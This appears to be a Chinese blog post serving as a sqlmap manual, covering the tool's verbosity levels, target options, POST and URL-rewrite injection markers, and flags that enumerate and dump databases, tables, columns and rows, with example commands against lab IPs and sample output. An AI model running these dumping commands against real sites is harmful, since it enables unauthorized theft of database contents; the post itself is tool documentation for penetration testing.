您的位置:首页 > 数据库

SqlMap使用手册

2016-07-20 08:43 441 查看
0x00 SQLMAP简介
sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常大的检测引擎、具有多种特性的渗透实测器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。

支持的数据库:mysql,oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase and SAP MaxDB

SQL注入技术:错误注入,基于时间的错误注入,报错注入,union注入

枚举数据:users,password hasher,privileges,roles,databases,tables and columns

0x01 Sqlmap扫描等级(共有7个等级,默认为1)
0、只显示python错误以及严重的信息

1、同时显示基本信息和警告信息。(默认)

2、同时显示debug信息

3、同时显示注入的payload

4、同时显示HTTP请求

5、同时显示HTTP响应头

6、同时显示HTTP响应面

0x02 获取目标方式
参数:-u 或 --url

eg:python sqlmap.py -u http(s)://targeturl[:port]/[...]


0x03 从文本中获取多个目标扫描
参数:-m

文件中保存url格式如下,sqlmap会一个一个检测

www.target1.com/vuln1.php?q=foobar

www.target2.com/vuln2.asp?id=1

www.target3.com/vuln3/id/1*
0x04 从文件中加载HTTP请求
参数: -r

sqlmap可以从一个文本中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)。

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1
0x05 POST方式注入
参数: --data

此参数是吧数据以post方式提交,sqlmap会像检测GET参数一样检测POST的参数。

eg:python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1"
0x06 设定超时时间
参数: --timeout

可以设定一个HTTP(S)请求超过多久判定为超时,10.5表示10.5秒,默认是30秒。

0x07 设定重试超时
参数: --retries

当HTTP(S)超时时,可以设定重新尝试连接次数,默认是3次

0x08 测试参数
*

在伪静态注入测试时,sqlmap无法直接使用测试参数,可以在想测试参数的参数后面加*

eg:
1.python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

2.python sqlmap.py -u "http://targeturl/param1/value1/param2/value2/15*"
0x09 列举数据库系统的数据库
参数:--dbs

当前用户有权限读取包含所有数据库列表信息的表中的时候,即可列出所有的数据库。

0x10 列举数据库表
参数: --tables -D

列举指定数据库 -D xxxx 的所有表。如果不指定-D 则列举所有数据库中的所有表。

0x11 列举书库表中的字段

参数:--columns -T -D

列举指定数库,指定表中的字段。

eg:
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+
0x12 获取表中数据个数
参数: --count

列举指定数据库表中的数据个数。

eg:
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+
0x13 获取整个表的数据或某几个字段的数据。
--dump -D -T -C

列举某个数据库某个表的所有字段

python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users
列举某个数据库的某个表的某个字段的数据。

python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users -C ID,NAME


本文出自 “启思・朝圣者” 博客,请务必保留此出处http://dearch.blog.51cto.com/10423918/1827947
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: